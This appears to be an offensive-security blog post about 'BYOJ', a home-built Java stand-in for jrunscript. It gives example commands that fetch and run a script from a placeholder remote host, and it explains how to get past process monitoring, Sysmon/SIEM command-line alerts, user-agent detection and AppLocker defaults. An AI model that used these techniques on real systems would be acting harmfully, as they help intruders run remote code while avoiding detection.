This blog post will cover how you can build your own JRunscript, which can be used on a desired machine. It will also cover some evasion methods you can utilize in your own JRunscript, which will evade some of the recommended defensive security controls that I outlined in one of my previous blog posts. I created a Proof of Concept (PoC) of BYOJ that is highlighted in this post, which I have linked below.
Advantages of BYOJ:
- Ability to evade process monitoring and full command-line logging rules that look for "jrunscript.exe" process running or being created.
- Multi-platform compatibility (Windows, macOS, Linux) since it can be ran in Java Virtual Machine (JVM).
- Requires dropping compiled BYOJ file to disk.
|Snippet of BYOJ PoC - Exec Function|
If a function was shown as being native (e.g., load), then you can call the function directly using the eval method available in the ScriptEngine object.
|Snippet of BYOJ PoC - Calling Native Load Function|
Putting It All Together
After you have implemented all of your functions, you can put some logic in your Main function, along with any applicable switches in order to make it user friendly. The only switch I was focused on was the "-e" switch, which is the switch utilized in JRunscript to call the various functions. You could of course customize this to be anything. You can compile your code, and transfer the .class file to the desired machine(s) to be ran directly with the java executable. There is no need to export it as a JAR to be ran.
This will create a "BYOJ.class" file. You can transfer it to the desired machine(s) and invoke it like below as an example using the "exec" function. Note that you do not need to specify the ".class" extension.
java BYOJ -e "exec('whoami')"
Some examples of other supported functions and usage in the BYOJ PoC are shown below.
java BYOJ -e "load('http://x.x.x.x/blah.js')"
java BYOJ -e "cat('http://x.x.x.x/blah.js')"
java BYOJ -e "cp('http://x.x.x.x/blah.js','C:\\Temp\\something.txt')"
Defensive Control Evasion Using BYOJ
While utilizing BYOJ, you can evade a number of the defensive security controls that I outlined in my previous post on this topic.
User-Agent String Detection
Below you will see an example of using BYOJ to download a file with a custom user-agent string. The user-agent string specified represents IE 11 for Windows 8.1 in order to blend in with normal traffic. One thing to note is that when using the native load function, even when you specify a custom user-agent, it will append the "Java/<version>" string.
|Downloading File w/ BYOJ|
|Apache Log Entry - Downloading File w/ BYOJ|
Process Monitoring Detection
For process monitoring rules that are in place to look for "jrunscript.exe" running, BYOJ can evade that, since "jrunscript.exe" is not running.
|Process Monitoring - BYOJ Running|
Full Command-Line Detection
If Sysmon is running, and the event logs are being sent to a SIEM for processing with alerts built for "jrunscript.exe" process create events, BYOJ will evade that since the "jrunscript.exe" process is not being created. In this case, the "java.exe" process is being created and is executing the compiled BYOJ class file.
|Event Log from Sysmon - BYOJ Process Creation|
BYOJ is executed via the "java.exe" executable, which is a signed Oracle binary that resides in %PROGRAMFILES% or %PROGRAMFILES(x86)% in a default installation. As such, this will still evade the default AppLocker executable rules that are listed at the below link.